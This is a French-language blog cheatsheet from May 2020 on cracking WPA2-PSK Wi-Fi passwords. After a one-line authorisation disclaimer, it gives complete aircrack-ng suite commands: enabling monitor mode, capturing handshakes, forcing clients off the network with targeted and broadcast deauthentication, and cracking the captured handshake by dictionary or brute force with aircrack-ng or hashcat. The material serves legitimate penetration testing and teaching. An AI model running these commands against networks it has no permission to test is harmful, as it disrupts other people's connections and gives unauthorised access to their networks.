Cheatsheet : WPA2-PSK

Posted on mer. 20 mai 2020 in cheatsheet

Disclaimer

N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.

Mode monitoring

  • Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
  • Activer le mode monitoring sur l'interface :
airmon-ng start wlan0

L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec ip l).

Ciblage

airodump-ng wlan0mon

Repérer le BSSID et le channel CH du réseau ciblé.

Capture de handshake

airodump-ng -c <CHANNEL> --bssid <BSSID> -w . wlan0mon

Quand un handshake est capturé, le message [ WPA handshake: <mac> apparaît sur la première ligne.

Deauth

Forcer une station connectée à se réauthentifier :

  • Dans l'output du airodump-ng précédent, repérer la MAC d'une station à cibler (deuxième tableau, colonne STATION)
  • Lancer la deauth :
aireplay-ng -0 <n> -a <bssid> -c <station_mac> wlan0mon

Avec n le nombre de paquets de deauth à envoyer.

Il est possible de broadcaster la deauth à tous les clients, mais tous les clients n'honorent pas les deauth en broadcast :

aireplay-ng -0 <n> -a <bssid> wlan0mon

Cracking

Une fois les handshakes capturés, il est possible de casser les mots de passe avec une attaque par dictionnaire ou par force brute :

Avec aircrack-ng

aircrack-ng -a2 -b <bssid> -w <dict> <target.cap>

-a2 indique qu'il s'agit de WPA2 PSK, <target.cap> est le fichier généré par le airodump-ng.

Avec hashcat

cap2hccapx.bin <target.cap> <target.hccapx>
hashcat -m 2500 <target.hccapx> <dict>